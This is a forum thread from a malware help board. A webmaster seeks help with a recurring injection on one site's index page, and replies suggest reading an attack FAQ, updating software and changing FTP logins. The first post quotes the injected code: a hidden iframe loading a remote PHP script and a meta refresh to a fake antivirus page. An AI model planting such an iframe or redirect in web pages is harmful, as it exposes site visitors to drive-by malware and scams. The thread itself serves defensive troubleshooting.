Malware Related > Compromised Servers

bla.php script added to website

(1/3) > >>

100%Agave:
I have many websites hosted on our servers, so far only 1 website has had this script added to it's web pages.  This has happened numerous times and only seems to affect this one site and so far has only been added to the index.htm page.

I have removed it every time but it reappears about once per month.

If anyone can shed some light on this and what would be my best course of action, I would appreciate it.

This is what I see in the webpage itself.

<!-- ~ --><iframe src="http://gtswiat.pl/grafika/gora2/ss/bla.php" width=0 height=0 border=0></iframe>

<meta http-equiv="Refresh" content="0; URL=http://www.avxp-2008.net/scanner/f4aed1aad924015ac4cc3d829e89a296/5/">

<!-- ~ -->

I did notice that the meta http-equiv with the scanner url is new this time.

Thanks for your assistance.

Kayrac:
http://hackademix.net/2008/04/26/mass-attack-faq/

start with reading that

#2 update your app's, and remove offending code

#3 after all apps updated and you've read the above to familarize yourself with whats going on, see if it continues after removal, then go from there :)

-Brian

PS that fake antivirus meta tag is brand new, it'll probably continue to change constantly, that antivirus has basically 0 detection

http://www.virustotal.com/analisis/e46394a6e7ecdf1a50cbac801712334d

100%Agave:
I'm a little lost.  This particular website does not have a database.

What exactly am I looking for in the code and are we talking about actual code pages like .php, .asp, and .js?

Kayrac:
your looking for that iframe thing, whats your website i'll check it out tonight when i wake up and see if i can find any for you

The other stuff i'm not sure the SQL injection isn't really my thing, i just kinda know what to remove to 'fix' the pages :P

100%Agave:
Thanks, I already removed the script and only found it on the index page.  I have been removing it about once a month for the last several months but it keeps coming back.  I am going to change the ftp access logins again for this site.

Since this site does not have a database, I am more concerned with how the script keeps getting put on that page.  I have already checked the permissions necessary to access that page and as far as I can see no one would be able to gain access except for the site owner or someone that guessed the site owners login into.

I am searching now to see if the script is on any other pages but I spot checked and didn't find it.

If I can't get more info about this, I will send you the site so you can take a look at it.

Thanks,

Navigation

[0] Message Index

[#] Next page

Go to full version